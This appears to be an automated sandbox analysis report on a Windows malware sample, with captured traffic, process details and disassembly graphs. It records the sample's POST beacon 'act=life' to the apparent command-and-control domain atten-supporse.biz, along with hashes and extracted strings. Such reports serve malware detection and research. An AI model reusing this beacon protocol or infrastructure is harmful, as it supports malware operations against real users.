                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: atten-supporse.biz
                                    2024-12-09 19:27:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                    Data Ascii: act=life
                                    2024-12-09 19:27:05 UTC1014INHTTP/1.1 200 OK
                                    Date: Mon, 09 Dec 2024 19:27:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=khibr0idr77qq3ejart5kg0ulh; expires=Fri, 04-Apr-2025 13:13:44 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aE3J%2Fa62Ng51XPMATXUSAcpeApqe66cTAVT46Q%2B2Yhgi4NVM6szusuw4gHBXh79dE8hPE05SWyik4khQR61t52nnx6TO4PGRm8BVqhFOjDKzASh1T34ASgpkP6OOTpJUMXCkGnE%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8ef763f72c828cec-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1939&rtt_var=735&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1505930&cwnd=204&unsent_bytes=0&cid=fedc39e825818c2e&ts=1260&x=0"
                                    2024-12-09 19:27:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                    Data Ascii: 2ok
                                    2024-12-09 19:27:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:14:27:01
                                    Start date:09/12/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0xf90000
                                    File size:1'838'080 bytes
                                    MD5 hash:1524DA94FEEEBB2A921C3065F4DA2383
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:0.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:41.2%
                                      Total number of Nodes:68
                                      Total number of Limit Nodes:5
                                      execution_graph 21703 f987f0 21707 f987fc 21703->21707 21704 f98979 ExitProcess 21705 f98974 21712 fcb400 FreeLibrary 21705->21712 21707->21704 21707->21705 21711 f9cdf0 CoInitializeEx 21707->21711 21712->21704 21713 f9ce55 21714 f9ce70 21713->21714 21717 fc6f90 21714->21717 21716 f9ceb9 21718 fc6fc0 21717->21718 21719 fc71d6 SysAllocString 21718->21719 21722 fc750c 21718->21722 21721 fc71fe 21719->21721 21720 fc7536 GetVolumeInformationW 21724 fc7558 21720->21724 21721->21722 21723 fc7206 CoSetProxyBlanket 21721->21723 21722->21720 21723->21722 21726 fc7226 21723->21726 21724->21716 21725 fc74fa SysFreeString SysFreeString 21725->21722 21726->21725 21727 fcbf91 21729 fcbef0 21727->21729 21728 fcbff7 21729->21728 21732 fcb480 LdrInitializeThunk 21729->21732 21731 fcc01d 21732->21731 21733 fcbb4f 21734 fcbb70 21733->21734 21734->21734 21735 fcbbbe 21734->21735 21737 fcb480 LdrInitializeThunk 21734->21737 21737->21735 21738 f9a960 21741 f9a990 21738->21741 21739 f9ae26 21741->21739 21741->21741 21742 fc9b60 21741->21742 21743 fc9b75 21742->21743 21744 fc9b73 21742->21744 21745 fc9b7a RtlFreeHeap 21743->21745 21744->21739 21745->21739 21746 fcbc65 21747 fcbc90 21746->21747 21750 fcbcde 21747->21750 21753 fcb480 LdrInitializeThunk 21747->21753 21748 fcbd6f 21750->21748 21754 fcb480 LdrInitializeThunk 21750->21754 21752 fcbde7 21753->21750 21754->21752 21755 fe9547 21756 fea3ac VirtualAlloc 21755->21756 21757 fea3be 21756->21757 21758 f9ce23 CoInitializeSecurity 21759 fe9922 21760 fe995d VirtualAlloc 21759->21760 21762 fcd920 21763 fcd940 21762->21763 21766 fcd98e 21763->21766 21768 fcb480 LdrInitializeThunk 21763->21768 21764 fcda2e 21766->21764 21769 fcb480 LdrInitializeThunk 21766->21769 21768->21766 21769->21764 21775 fc51c0 21776 fc51dd 21775->21776 21778 fc5219 21776->21778 21779 fcb480 LdrInitializeThunk 21776->21779 21779->21776 21780 fc9b40 21783 fcca60 21780->21783 21782 fc9b4a RtlAllocateHeap 21784 fcca80 21783->21784 21784->21782 21784->21784 21785 f9d2c5 CoUninitialize 21786 f9e062 21785->21786 21787 fcb781 21788 fcb822 21787->21788 21789 fcbace 21788->21789 21791 fcb480 LdrInitializeThunk 21788->21791 21791->21789

                                      Executed Functions

                                      Function 00FC6F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 fc6f90-fc6fb8 1 fc6fc0-fc7006 0->1 1->1 2 fc7008-fc701f 1->2 3 fc7020-fc705b 2->3 3->3 4 fc705d-fc709a 3->4 5 fc70a0-fc70b2 4->5 5->5 6 fc70b4-fc70cd 5->6 8 fc70cf 6->8 9 fc70d7-fc70e2 6->9 8->9 10 fc70f0-fc7122 9->10 10->10 11 fc7124-fc717b 10->11 13 fc7526-fc7556 call fcce00 GetVolumeInformationW 11->13 14 fc7181-fc71b2 11->14 19 fc7558-fc755c 13->19 20 fc7560-fc7562 13->20 15 fc71c0-fc71d4 14->15 15->15 17 fc71d6-fc7200 SysAllocString 15->17 23 fc7516-fc7522 17->23 24 fc7206-fc7220 CoSetProxyBlanket 17->24 19->20 21 fc7587-fc758e 20->21 25 fc75a7-fc75bf 21->25 26 fc7590-fc7597 21->26 23->13 27 fc750c-fc7512 24->27 28 fc7226-fc723a 24->28 30 fc75c0-fc75d4 25->30 26->25 29 fc7599-fc75a5 26->29 27->23 31 fc7240-fc7261 28->31 29->25 30->30 32 fc75d6-fc760f 30->32 31->31 34 fc7263-fc72e3 31->34 35 fc7610-fc7650 32->35 39 fc72f0-fc7313 34->39 35->35 36 fc7652-fc767f call fadc20 35->36 42 fc7680-fc7688 36->42 39->39 41 fc7315-fc733e 39->41 51 fc74fa-fc750a SysFreeString * 2 41->51 52 fc7344-fc7366 41->52 42->42 43 fc768a-fc768c 42->43 45 fc7570-fc7581 43->45 46 fc7692-fc76a2 call f98070 43->46 45->21 48 fc76a7-fc76ae 45->48 46->45 51->27 54 fc736c-fc736f 52->54 55 fc74f0-fc74f6 52->55 54->55 56 fc7375-fc737a 54->56 55->51 56->55 57 fc7380-fc73c8 56->57 59 fc73d0-fc73e4 57->59 59->59 60 fc73e6-fc73f4 59->60 61 fc73f8-fc73fa 60->61 62 fc74df-fc74ec 61->62 63 fc7400-fc7406 61->63 62->55 63->62 64 fc740c-fc741a 63->64 66 fc741c-fc7421 64->66 67 fc7467 64->67 69 fc7446-fc744a 66->69 68 fc7469-fc74a2 call f97ff0 call f98e90 67->68 80 fc74a9-fc74b1 68->80 81 fc74a4 68->81 71 fc744c-fc7455 69->71 72 fc7430-fc7438 69->72 75 fc745c-fc7460 71->75 76 fc7457-fc745a 71->76 74 fc743b-fc7444 72->74 74->68 74->69 75->74 77 fc7462-fc7465 75->77 76->74 77->74 82 fc74b8-fc74db call f98020 call f98000 80->82 83 fc74b3 80->83 81->80 82->62 83->82
                                      APIs
                                      • SysAllocString.OLEAUT32(D080DE8F), ref: 00FC71DC
                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FC7218
                                      • SysFreeString.OLEAUT32(?), ref: 00FC7504
                                      • SysFreeString.OLEAUT32(?), ref: 00FC750A
                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00FC7552
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID: String$Free$AllocBlanketInformationProxyVolume
                                      • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                      • API String ID: 1773362589-264043890
                                      • Opcode ID: 9db8cde3618f296cdbc43c2b9645efd0b74e6f37aeaf598de700eb98e92daa7e
                                      • Instruction ID: 9b9bafadef8236b8423fd09b63d8378f0bcab757afec684df6ebb519b25bfb41
                                      • Opcode Fuzzy Hash: 9db8cde3618f296cdbc43c2b9645efd0b74e6f37aeaf598de700eb98e92daa7e
                                      • Instruction Fuzzy Hash: 9E02FF71A0C3019FE314DF64CC82B6BBBE5EBD5314F14882CF6959B2A1E679D805CB92
                                      Function 00F9A960 Relevance: 9.2, Strings: 7, Instructions: 401COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 88 f9a960-f9a989 89 f9a990-f9a9e5 88->89 89->89 90 f9a9e7-f9aadf 89->90 91 f9aae0-f9ab1b 90->91 91->91 92 f9ab1d-f9ab39 91->92 93 f9ab40-f9ab69 92->93 93->93 94 f9ab6b-f9ab86 call f9b6a0 93->94 97 f9ae29-f9ae32 94->97 98 f9ab8c-f9ab98 94->98 99 f9aba0-f9abb2 98->99 99->99 100 f9abb4-f9abb9 99->100 101 f9abc0-f9abcc 100->101 102 f9abce-f9abd1 101->102 103 f9abd3-f9abe4 101->103 102->101 102->103 104 f9abea-f9abff 103->104 105 f9ae20-f9ae21 call fc9b60 103->105 106 f9ac00-f9ac41 104->106 109 f9ae26 105->109 106->106 108 f9ac43-f9ac50 106->108 110 f9ac52-f9ac58 108->110 111 f9ac84-f9ac88 108->111 109->97 114 f9ac67-f9ac6b 110->114 112 f9ae1e 111->112 113 f9ac8e-f9acb6 111->113 112->105 115 f9acc0-f9acf4 113->115 114->112 116 f9ac71-f9ac78 114->116 115->115 117 f9acf6-f9acff 115->117 118 f9ac7a-f9ac7c 116->118 119 f9ac7e 116->119 122 f9ad01-f9ad0b 117->122 123 f9ad34-f9ad36 117->123 118->119 120 f9ac60-f9ac65 119->120 121 f9ac80-f9ac82 119->121 120->111 120->114 121->120 124 f9ad17-f9ad1b 122->124 123->112 125 f9ad3c-f9ad52 123->125 124->112 126 f9ad21-f9ad28 124->126 127 f9ad60-f9adb2 125->127 128 f9ad2a-f9ad2c 126->128 129 f9ad2e 126->129 127->127 130 f9adb4-f9adbe 127->130 128->129 133 f9ad10-f9ad15 129->133 134 f9ad30-f9ad32 129->134 131 f9adc0-f9adc8 130->131 132 f9adf4-f9adf8 130->132 135 f9add7-f9addb 131->135 136 f9adfe-f9ae1c call f9a6d0 132->136 133->123 133->124 134->133 135->112 137 f9addd-f9ade4 135->137 136->105 139 f9adea-f9adec 137->139 140 f9ade6-f9ade8 137->140 142 f9adee-f9adf2 139->142 143 f9add0-f9add5 139->143 140->139 142->143 143->135 144 f9adfa-f9adfc 143->144 144->112 144->136
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                      • API String ID: 0-490458541
                                      • Opcode ID: 794f568acefc073860b860c0a57bbf40d3d7bdf94f0ab98a412a39263d49fbd2
                                      • Instruction ID: 7b69d1046816938049944c0da529254d2602146177247b22d3680698a256f838
                                      • Opcode Fuzzy Hash: 794f568acefc073860b860c0a57bbf40d3d7bdf94f0ab98a412a39263d49fbd2
                                      • Instruction Fuzzy Hash: D8C13572A0C3504BDB24CF6488906ABFBD3ABC2314F1E892DE9D55B342D675C80AD783
                                      Function 00F9CE55 Relevance: 9.0, Strings: 7, Instructions: 275COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 145 f9ce55-f9ce62 146 f9ce70-f9ce9b 145->146 146->146 147 f9ce9d-f9ced5 call f98720 call fc6f90 146->147 152 f9cee0-f9cf06 147->152 152->152 153 f9cf08-f9cf6b 152->153 154 f9cf70-f9cfa7 153->154 154->154 155 f9cfa9-f9cfba 154->155 156 f9d03d 155->156 157 f9cfc0-f9cfcb 155->157 159 f9d041-f9d049 156->159 158 f9cfd0-f9cfd9 157->158 158->158 160 f9cfdb 158->160 161 f9d05b-f9d068 159->161 162 f9d04b-f9d04f 159->162 160->159 164 f9d08b-f9d093 161->164 165 f9d06a-f9d071 161->165 163 f9d050-f9d059 162->163 163->161 163->163 167 f9d0ab-f9d1c6 164->167 168 f9d095-f9d096 164->168 166 f9d080-f9d089 165->166 166->164 166->166 170 f9d1d0-f9d215 167->170 169 f9d0a0-f9d0a9 168->169 169->167 169->169 170->170 171 f9d217-f9d239 170->171 172 f9d240-f9d250 171->172 172->172 173 f9d252-f9d27f call f9b6a0 172->173 175 f9d284-f9d29e 173->175
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 445878D5F73E894823D904AF30EFEBBC$F^$I@$N~ :$VgfW$atten-supporse.biz$z@(
                                      • API String ID: 0-2172821966
                                      • Opcode ID: e3222c9b57adc92ada48b242b1dc706a39f0cf591b0b965c072ca42f668ab5ee
                                      • Instruction ID: d184a728ec450791e9326e7f3e323a86cf4a3d71bcc5731179471147f41aed7e
                                      • Opcode Fuzzy Hash: e3222c9b57adc92ada48b242b1dc706a39f0cf591b0b965c072ca42f668ab5ee
                                      • Instruction Fuzzy Hash: DF91E1B150D3C18BE735CF25D890BEBBBE0AB96314F188D6CC4D98B252D738454ADB92
                                      Function 00F987F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 200 f987f0-f987fe call fcafd0 203 f98979-f98981 ExitProcess 200->203 204 f98804-f9880b call fc4680 200->204 207 f98811-f98849 204->207 208 f98974 call fcb400 204->208 212 f9884b-f9884f 207->212 213 f98851-f988d6 207->213 208->203 212->213 215 f988d8-f9894e 213->215 216 f98950-f98968 call f99cc0 213->216 215->216 216->208 219 f9896a call f9cdf0 216->219 221 f9896f call f9b670 219->221 221->208
                                      APIs
                                      • ExitProcess.KERNEL32(00000000), ref: 00F9897C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: YO9W
                                      • API String ID: 621844428-386669604
                                      • Opcode ID: 177a339ab13ec5702a1158fbef3c8872ca36f3c467fce3ed2ef9e84601aec8b1
                                      • Instruction ID: d7cda5ea1d746ee9ce0c214ebf76dac849c7120df0a70a5a7e6b8064c5b4449d
                                      • Opcode Fuzzy Hash: 177a339ab13ec5702a1158fbef3c8872ca36f3c467fce3ed2ef9e84601aec8b1
                                      • Instruction Fuzzy Hash: 2931CA33F5021807C71C79B99C563AAB1874BC4A10F0F863C9DD8AB386FCB98C0552D1
                                      Function 00FCB480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 237 fcb480-fcb4b2 LdrInitializeThunk
                                      APIs
                                      • LdrInitializeThunk.NTDLL(00FCD4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00FCB4AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                      Function 00F99CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 265 f99cc0-f99cdf 266 f99ce0-f99cfa 265->266 266->266 267 f99cfc-f99d37 266->267 268 f99d40-f99d69 267->268 268->268 269 f99d6b-f99d72 268->269 270 f99d75-f99d98 call fcaf90 269->270
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \U^_
                                      • API String ID: 0-352632802
                                      • Opcode ID: 5b9ecb08d5d284367a6722c6f1e3e4133d79d0797d14f6a02f7757e8bdf94b99
                                      • Instruction ID: dd88d8bf4d8e598e1f389cd911989780b9c48f804ffad2717f2cbf55db8b4212
                                      • Opcode Fuzzy Hash: 5b9ecb08d5d284367a6722c6f1e3e4133d79d0797d14f6a02f7757e8bdf94b99
                                      • Instruction Fuzzy Hash: 0A11E23060D3808FD3249F349895AABBBA6EFD7754F544A2CE0C96B241C735980ADF96
                                      Function 00F9CDF0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 230 f9cdf0-f9ce20 CoInitializeEx
                                      APIs
                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 00F9CE04
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                      • Associated: 00000000.00000002.2181419846.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181434322.0000000000FD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181480794.0000000000FE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001245000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181494747.0000000001282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181714377.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181813159.000000000141B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2181827654.000000000141C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f90000_file.jbxd
                                      Similarity
                                      • API ID: Initialize
                                      • String ID:
                                      • API String ID: 2538663250-0
                                      • Opcode ID: 4b6554038631f1c67cf4c8c367a5b56b1a03f6f7e21ac90d90f4b11ae4e02d7d
                                      • Instruction ID: e9a492696dfafb44738c630e662662c7dea1e2d1f62704861c60b10d00391625
                                      • Opcode Fuzzy Hash: 4b6554038631f1c67cf4c8c367a5b56b1a03f6f7e21ac90d90f4b11ae4e02d7d
                                      • Instruction Fuzzy Hash: BFD0A7212A154C27D190A22CDC57F2B335DC703B68F000627A2A2CA2D1D8406921E5A5
                                      Function 00F9CE23 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 231 f9ce23-f9ce52 CoInitializeSecurity
                                      APIs
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00F9CE35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2181434322.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
